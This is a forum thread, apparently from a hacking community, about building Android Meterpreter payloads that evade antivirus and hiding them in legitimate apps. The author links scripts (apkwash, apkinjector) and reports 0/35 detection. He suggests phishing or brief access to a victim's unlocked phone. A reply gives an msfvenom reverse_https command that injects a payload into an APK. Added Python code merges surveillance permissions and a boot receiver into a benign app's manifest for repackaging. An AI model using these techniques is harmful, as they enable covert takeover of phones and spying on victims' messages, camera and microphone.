Android - Meterpreter Payload - AV Bypass + APK Injector Scripts


n33dsh3llz

Hello everyone,

This weekend I got a little bored and began toying with Android payloads, just to try a meterpreter shell and see how it is. Upon doing so, I noticed the payload generated from msfvenom required me to ignore my AV to install. So this sent me down a path to bypass antivirus, which, come to find out, WAS EXTREMELY EASY!

I began with apkwash, which simply takes the msfvenom-generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute, and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only a ducky script could auto-download and install the payload; that would make this awesome. Otherwise, you would need a couple of minutes alone with their unlocked phone.

Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way than injecting the same AV-bypassing payload into a legit app? Well, some people had examples online on how to do this, but it required a long process to do it all manually. Why not script it? Well, each app is different, so this can be hit or miss, so I allowed manual pieces for those special apps. The result was apkinjector, which, by utilizing the apkwash technique of AV bypass, is able to make a hidden payload inside another APK. Perfect! Now, the downfall to this is that APKTool has issues with certain packages (Facebook, Starbucks, etc.). I have had success injecting into about 70-80% of .apk files.

 

Github:

https://github.com/jbreed/apkwash

https://github.com/jbreed/apkinjector


Hi,
every time I try to run the scripts this message appears:

 "An old version of the msfvenom generated payload was detected. Make sure you have everything compeltely updated in Kali!

 Older payloads have not been configured in this script to bypass AV. With that, this script still results in a 1/35 on nodistribute.com for the old payloads, but it is not recommended to continue."

I run apt-get update && apt-get upgrade before the script.

I'm using Kali Sana.


2 hours ago, unlinkable said:

 every time I try to run the scripts this message appears: "An old version of the msfvenom generated payload was detected. [...]" I run apt-get update && apt-get upgrade before the script. I'm using Kali Sana.


What is happening is that the script is seeing PayloadTrustManager.smali in the pulled-apart payload generated by msfvenom. This payload has a signature I haven't spent time avoiding for AVG. The quickest solution is to make sure you are completely updated. On Kali Rolling:

apt-get update

apt-get upgrade

apt-get dist-upgrade


Also, after spending a weekend throwing this together, I realized the '-x' option on msfvenom appears to get the job done as well for injecting into other payloads. So if you want to do a phishing attack, instead of using apkinjector you can use msfvenom with the apk to inject into, followed by the -x option. Of course, the bash script is very similar to what msfvenom is doing, so looking it over will give you an understanding of what is happening, and if it is flagged by an AV you can simply modify the bash script to get around it.

msfvenom -p android/meterpreter/reverse_https LPORT=XXXX LHOST=X.X.X.X -x original.apk -o payload.apk

Edited by n33dsh3llz
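Added example (not code from apkinjector, apkwash or msfvenom) showing the manifest half of what the injection described above has to do: the decoded AndroidManifest.xml of the target app gets the permissions and the service/receiver the stage needs, with uses-permission entries kept ahead of <application> and relative component names qualified with the stage package. The same helper then pulls the indicators a reviewer would look for from a decoded manifest. Assumptions: the component names (MainService, MainBroadcastReceiver) and the permission subset in the constructed payload manifest are an approximation of what the msfvenom template declares, and com.metasploit.stage is the assumed stage package. The smali patch that makes the target's launcher activity start the stage is not shown. Note that the stage_components check is exactly what apkwash's renaming defeats, so treat a clean result there as weak evidence; the permission set and a BOOT_COMPLETED receiver on an app that has no business with them are the better tell.

```python
"""Merge the manifest entries an msfvenom Android stage needs into a
legitimate app's decoded AndroidManifest.xml, then check a manifest for
those indicators.  Hypothetical illustration; not apkinjector's or
msfvenom's own code."""
import copy
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ET.register_namespace("android", ANDROID_NS)
NAME = "{%s}name" % ANDROID_NS
STAGE_PKG = "com.metasploit.stage"  # assumed package of the Metasploit Android stage

# Constructed sample: a trimmed manifest of a benign target app.
TARGET_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

# Constructed sample approximating what the msfvenom stage declares
# (subset of permissions; component names are an assumption).
PAYLOAD_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.metasploit.stage">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="MainActivity">
    <activity android:name=".MainActivity"/>
    <service android:name=".MainService"/>
    <receiver android:name=".MainBroadcastReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""


def _name(el):
    return el.get(NAME, "")


def _qualified(el, pkg):
    """Return a copy whose android:name is fully qualified (".Foo" -> "pkg.Foo")."""
    el = copy.deepcopy(el)
    if _name(el).startswith("."):
        el.set(NAME, pkg + _name(el))
    return el


def merge_manifests(target_xml, payload_xml):
    """Add the stage's missing uses-permission entries and its service/receiver
    to the target manifest.  The stage's own activity is dropped: in an injected
    APK the target's launcher activity is patched (in smali) to start the stage,
    which this example does not do."""
    target = ET.fromstring(target_xml)
    payload = ET.fromstring(payload_xml)
    app = target.find("application")
    have = {_name(p) for p in target.findall("uses-permission")}
    pos = list(target).index(app)  # uses-permission must come before <application>
    for perm in payload.findall("uses-permission"):
        if _name(perm) not in have:
            target.insert(pos, copy.deepcopy(perm))
            pos += 1
            have.add(_name(perm))
    for comp in payload.find("application"):
        if comp.tag in ("service", "receiver"):
            app.append(_qualified(comp, payload.get("package")))
    return ET.tostring(target, encoding="unicode")


def payload_indicators(manifest_xml, stage_pkg=STAGE_PKG):
    """Indicators a reviewer would pull from a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    return {
        "stage_components": sorted(_name(c) for c in app if _name(c).startswith(stage_pkg + ".")),
        "permissions": sorted(_name(p) for p in root.findall("uses-permission")),
        "boot_receiver": any(_name(a) == "android.intent.action.BOOT_COMPLETED" for a in root.iter("action")),
    }


if __name__ == "__main__":
    merged = merge_manifests(TARGET_MANIFEST, PAYLOAD_MANIFEST)
    print(merged)
    print(payload_indicators(merged))
```

Run it against the decoded output of apktool d on a real pair of APKs by reading the two manifest files into the two arguments; the merged text is what goes back under the target's decoded tree before apktool b and re-signing.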
